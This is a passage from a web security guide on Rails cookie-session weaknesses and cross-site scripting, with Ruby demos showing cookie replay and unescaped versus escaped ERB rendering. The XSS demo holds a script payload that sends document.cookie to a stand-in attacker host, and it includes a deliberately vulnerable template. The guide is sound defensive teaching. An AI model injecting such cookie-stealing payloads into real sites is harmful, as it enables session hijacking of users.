• Unlike the server-side session stores, the CookieStore lets the client read all session data. This is usually not a problem, but in certain cases it is: some applications require sensitive user data (such as account numbers or credit card numbers) to remain hidden even after the user is logged in, as an extra layer of protection. Also consider that the cookie may be kept as plain text in the browser's cache on the client. Sensitive data belongs on the server, not in the session.
• The CookieStore is vulnerable to replay attacks: because the cookie does not incorporate a nonce,* a user who holds a valid session cookie can replay it at any later time and convince the server that it is current. Never store transient data, such as account balances, in the session.
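Both points above follow from how a cookie-based session is built: the payload is only serialized and Base64-encoded, and the HMAC appended to it proves integrity, not freshness or secrecy. The following is an added example, not code from the original page or from Rails itself; it mimics the Marshal-plus-HMAC layout of the classic CookieStore with a constructed secret and constructed session contents. Anyone holding the cookie can read it without the secret, and an old cookie still verifies after the server has issued a newer one.

```ruby
require 'openssl'

# Constructed secret for the demo; a real application keeps this in its
# configuration and never sends it to the client.
SECRET = 'example-secret-for-demo-only'

# Constant-time comparison so the verifier does not leak digest bytes via timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side: serialize the session, Base64-encode it (not encrypt it),
# and append an HMAC so the server can detect tampering.
def build_session_cookie(session_hash, secret = SECRET)
  data = [Marshal.dump(session_hash)].pack('m0')        # strict Base64, no newlines
  digest = OpenSSL::HMAC.hexdigest('SHA1', secret, data)
  "#{data}--#{digest}"
end

# Server side: only trust the payload after the HMAC checks out.
# Returns nil for a missing or forged signature.
def verify_session_cookie(cookie, secret = SECRET)
  data, digest = cookie.split('--', 2)
  return nil if data.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest('SHA1', secret, data)
  return nil unless secure_equal?(digest, expected)
  Marshal.load(data.unpack1('m0'))
end

# Client side: the secret is not needed to read the session, only to forge it.
def read_session_without_secret(cookie)
  data = cookie.split('--', 2).first
  Marshal.load(data.unpack1('m0'))
end

# Replay: the server issues a fresh cookie after a withdrawal, but the cookie
# captured earlier carries nothing (no nonce, no expiry) that marks it as stale,
# so it still verifies and still reports the old balance.
def replay_demo
  old_cookie = build_session_cookie(user_id: 42, balance: 500)
  new_cookie = build_session_cookie(user_id: 42, balance: 100)
  [verify_session_cookie(old_cookie)[:balance],
   verify_session_cookie(new_cookie)[:balance]]
end

if __FILE__ == $PROGRAM_NAME
  cookie = build_session_cookie(user_id: 42, account_number: '1234-5678')
  p read_session_without_secret(cookie)   # readable with no secret at all
  p replay_demo                           # old balance still accepted
end
```

The tamper check is the part the cookie store gets right: flipping a byte of the payload or the digest makes verification fail. What it cannot do is hide the payload or tell a replayed cookie from a current one, which is why the text says to keep sensitive and transient values out of the session entirely.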
Cross-Site Scripting
Cross-site scripting (abbreviated XSS, to avoid confusion with Cascading Style Sheets and Content Scramble System) is one of the most common vulnerabilities in recently built web applications. "Web 2.0"-style applications are particularly exposed because of their emphasis on user-generated content.
XSS is usually made possible by inadequate escaping of user-entered content, particularly in blog posts, comments, and other user-generated content. In an XSS attack, an attacker inserts code, typically JavaScript, into a third-party site (the target) in such a way that the browser treats it as part of the target page for security purposes: the injected script runs with the target's origin and so can read its cookies and DOM.
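To make the escaping point concrete, here is an added example (not code from the original page or from Rails) that renders a constructed comment through two plain ERB templates: one that interpolates the value verbatim and one that HTML-escapes it first. Plain ERB's `<%= %>` does no escaping on its own; `CGI.escapeHTML` is assumed here as the equivalent of the old Rails `h()` helper.

```ruby
require 'erb'
require 'cgi'

# Constructed user-submitted comment carrying an injected script.
INJECTED_COMMENT = %q{Nice post! <script>document.location='http://attacker.example/?c='+document.cookie</script>}

# Vulnerable: <%= %> in plain ERB inserts the string verbatim, so the
# browser parses the <script> element as part of the page.
VULNERABLE_TEMPLATE = '<div class="comment"><%= comment %></div>'

# Hardened: escape the untrusted value before it reaches the HTML body.
# CGI.escapeHTML turns < > & " ' into entities, so the browser shows the
# text instead of executing it.
SAFE_TEMPLATE = '<div class="comment"><%= CGI.escapeHTML(comment) %></div>'

def render(template, comment)
  ERB.new(template).result_with_hash(comment: comment)
end

def render_vulnerable(comment)
  render(VULNERABLE_TEMPLATE, comment)
end

def render_safe(comment)
  render(SAFE_TEMPLATE, comment)
end

# Crude regression check for a test suite: does a rendered page still
# contain a live <script> start tag?
def contains_script_tag?(html)
  html.match?(/<script\b/i)
end

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable(INJECTED_COMMENT)   # script lands in the page as-is
  puts render_safe(INJECTED_COMMENT)         # &lt;script&gt;... shown as text
end
```

Note that `CGI.escapeHTML` is the right tool for element bodies and quoted attribute values only. A user-controlled value placed into a URL attribute (`href`, `src`) or inside a `<script>` block needs its own context-specific encoding; entity-escaping alone does not stop a `javascript:` URL.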